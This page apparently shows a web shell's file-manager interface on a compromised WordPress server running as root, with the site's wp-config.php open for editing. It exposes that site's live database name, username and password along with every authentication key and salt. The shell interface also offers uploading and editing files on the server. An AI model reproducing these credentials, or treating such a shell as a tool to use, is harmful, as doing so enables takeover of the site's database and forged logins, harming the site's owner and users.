🌙 File Manager - @r3dc0d3r1337-WORDPRESS
PHP:
8.1.34
Server:
Apache
OS:
Linux 5.14.0-611.55.1.el9_7.x86_64
User:
root
Navigate
Upload:
Upload
New File
New Folder
Editing: wp-config.php
<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * Localized language * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', "tpaytakhtcom_tahpaytakhtdb864" ); /** Database username */ define( 'DB_USER', "tpaytakhtcom_tahpaytakhtus249" ); /** Database password */ define( 'DB_PASSWORD', "i3v]AUbl0mzp" ); /** Database hostname */ define( 'DB_HOST', "localhost" ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', '$={|S-I+LA$wB6f0}IbO~$~Am:Z3jh)3g]6wf&){B8j1#zt!aKP83w=Xpv(s7m!<' ); define( 'SECURE_AUTH_KEY', 'ebuAZf>uU/irj:1U;zVd{Z!Zw]KHc6{~uu=)2UcE qTA)Kh7wM{vOj*[&4`uS}p=' ); define( 'LOGGED_IN_KEY', 'n~w*5jFITCc:^+v-{b/]2=5&N(3w&%7q/URC1mS9uc#?*3lspC&X- D47$Q-(7dU' ); define( 'NONCE_KEY', '3JTqFpze)04z^W;mAGDL3<-l-F=HdwoKo^p0]s` !d7WZL6=Lx3@[yo`gZG(#TzV' ); define( 'AUTH_SALT', 'I;COT`x+c{Hg0ta=BR>AafI^<O=Rt[04d^?ThLa=(Z5+@)h4YvFC|kW-27qk&ds,' ); define( 'SECURE_AUTH_SALT', 'Dk-rnp>dTm*jDz=y${dI8UJ&DPJ=MB7Lq|5s^u3y#G>SD_?vA>6%n>[C.dm{dtvN' ); define( 'LOGGED_IN_SALT', ')tH%xKEfJO-}Fa(qs$Qu`GGQy949`79?Z/&mHszbqxw;n?L$jiR`u{N:*C1h,?$9' ); define( 'NONCE_SALT', 'lli!>e nVtm,@SUJb(xW{ P3GlPV3q~)>&,mM:ob;Ak@T1ot7%cZc=zp(`5_li[F' ); define( 'WP_CACHE_KEY_SALT', '9-6e1({h&=3Ceiw>Q&<g]H5Y5Ht}34y_W4=DAo&In$oxz6?;X/.rDoOaob]OO=|n' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'zokmu_'; /* Add any custom values between this line and the "stop editing" line. */ /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ if ( ! defined( 'WP_DEBUG' ) ) { define( 'WP_DEBUG', false ); } define( 'WP_POST_REVISIONS', 3 ); define( 'WP_ENVIRONMENT_TYPE', 'local' ); /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', dirname(__FILE__) . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php'; //Disable File Edits define('DISALLOW_FILE_EDIT', true);
Save Changes
Cancel
Create New File
Create New Folder